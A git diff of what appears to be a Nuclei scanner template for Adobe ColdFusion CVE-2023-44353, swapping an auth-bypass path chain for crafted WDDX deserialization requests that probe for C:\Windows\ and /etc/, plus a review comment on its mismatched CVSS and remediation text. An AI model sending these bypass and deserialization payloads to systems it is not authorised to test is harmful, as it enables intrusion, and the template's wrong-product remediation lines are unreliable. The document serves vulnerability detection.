1 parent
bc1a965
commit 5b9a2cd
Showing
1 changed file
with
38 additions
and
69 deletions.
@@ -1,113 +1,82 @@ | ||
id: CVE-2023-44353 | ||
|
||
info: | ||
name: Adobe Coldfusion Auth Bypass + Remote Code Execution | ||
name: Adobe ColdFusion WDDX Deserialization Gadgets | ||
author: salts | ||
severity: critical | ||
description: | | ||
Adobe Coldfusion contains a persistent auth bypass issue previously tagged as CVE-2023-29298 and CVE-2023-38205, these ended up being difficult/impossible | ||
to patch, because the fault was actually in the production IIS/Apache connector, where a hard coded rule was put in place. If an administrator ran the | ||
"lockdown" or production installer, this vulnerable path would be exposed to the internet. | ||
Recently, a remote deserialization / code execution flaw CVE-2023-44353 as published with public POC. This template chains the common auth bypass | ||
with the public POC looking for two common folders either C:\windows\ or /etc/. | ||
|
||
|
||
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. | ||
remediation: | | ||
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353 | ||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html | ||
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py | ||
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html | ||
remediation: | | ||
Update to the latest version of Confluence | ||
classification: | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 9.8 | ||
cve-id: CVE-2023-44353, CVE-2023-26347 | ||
metadata: | ||
tags: cve,cve2023,adobe,coldfusion,auth-bypass,rce | ||
cve-id: CVE-2023-44353 | ||
cwe-id: CWE-502 | ||
epss-score: 0.00227 | ||
epss-percentile: 0.60906 | ||
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 4 | ||
vendor: adobe | ||
product: coldfusion | ||
shodan-query: http.component:"Adobe ColdFusion" | ||
tags: cve,cve2023,adobe,coldfusion | ||
|
||
variables: | ||
version_path: "/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true" | ||
version_path: "/CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true" | ||
windows_known_path: "C:\\Windows\\" | ||
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" | ||
linux_known_path: "/etc/" | ||
linux_bad_path: "/thesecretcowlevelisreal/" | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
|
||
#Windows checks here.. | ||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket> | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket> | ||
#Linux checks here.. | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket> | ||
|
||
- | | ||
POST {{version_path}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
|
||
argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='acoldfusion.tagext.io.cache.CacheTaga'><var name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
|
||
cookie-reuse: true | ||
redirects: true | ||
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket> | ||
|
||
matchers-condition: or | ||
matchers: | ||
# First stage, I got a version via the auth bypass | ||
- type: dsl | ||
name: CVE-2023-26347 | ||
name: windows | ||
dsl: | ||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
condition: and | ||
# Second stage, I check for version success while sending filenames that should always exist on | ||
# the platform | ||
- "status_code_1 == 500 && status_code_2 == 404" | ||
- contains(body_1, "coldfusion.runtime") | ||
condition: and | ||
|
||
# This checks for the vulnerability on windows by sending a check for C:\\Windows\\ and C:\\Thisdefinitelydoesnotexist | ||
# If vulnerable, the different packets should return different results. Specifically the first should | ||
# Return a 500, 404, or canned error message, where the second should return the expected version. | ||
- type: dsl | ||
name: CVE-2023-44353 | ||
dsl: | ||
|
||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('wddxPacket', body_3) | ||
# I get the version number back from body 1 and body 3, but not body 2 | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_3) | ||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_2)" | ||
condition: and | ||
|
||
# This checks for the vulnerability on Linux by sending a check for /etc and /thesecretcowlevelisreal/ | ||
# If vulnerable, the different packets should return different results. Specifically the first should | ||
# Return a 500, 404, or canned error message, where the second should return the expected version. | ||
- type: dsl | ||
name: CVE-2023-44353 | ||
dsl: | ||
|
||
- status_code_1 == 200 | ||
- regex('wddxPacket', body_1) | ||
- regex('wddxPacket', body_5) | ||
# I get the version number back from body 1 and body 3, but not body 2 | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_1) | ||
- regex('\\d+,\\d+,\\d+,\\d+', body_5) | ||
- "!regex('\\d+,\\d+,\\d+,\\d+', body_4)" | ||
condition: and | ||
name: linux | ||
dsl: | ||
- "status_code_3 == 500 && status_code_4 == 404" | ||
- contains(body_3, "coldfusion.runtime") | ||
condition: and |
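Review bot: The classification block kept on the new side is internally inconsistent: `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` evaluates to a 6.1 base score (a reflected-XSS shaped vector), while `cvss-score: 9.8` and `severity: critical` describe the deserialization issue this template now targets, so the vector should be re-taken from the NVD / APSB23-52 entries already listed under `reference`. The `remediation` text also names the wrong product — the surviving line reads `Update to the latest version of Confluence` (the removed variant spoke of OpenCATS and XSS) and should instead point at the ColdFusion update from the APSB23-52 advisory the template already references, e.g. `Apply the ColdFusion update published in Adobe security bulletin APSB23-52.`. One thing to confirm in `variables`: the new `version_path` separates the query parameters with `%20` rather than `&` (`method=wizardHash%20inPassword=bar%20_cfclient=true`), so unless that is a deliberate ColdFusion parsing quirk, `inPassword` and `_cfclient` are currently part of the `method` value rather than independent parameters; the referenced NCC Group script would be the place to check the intended form. Since the matchers key on `status_code_1 == 500` plus `contains(body_1, "coldfusion.runtime")`, a malformed path that yields a generic 500 from a different handler would not be distinguishable from the gadget firing, so this is worth pinning down before relying on `verified: true`.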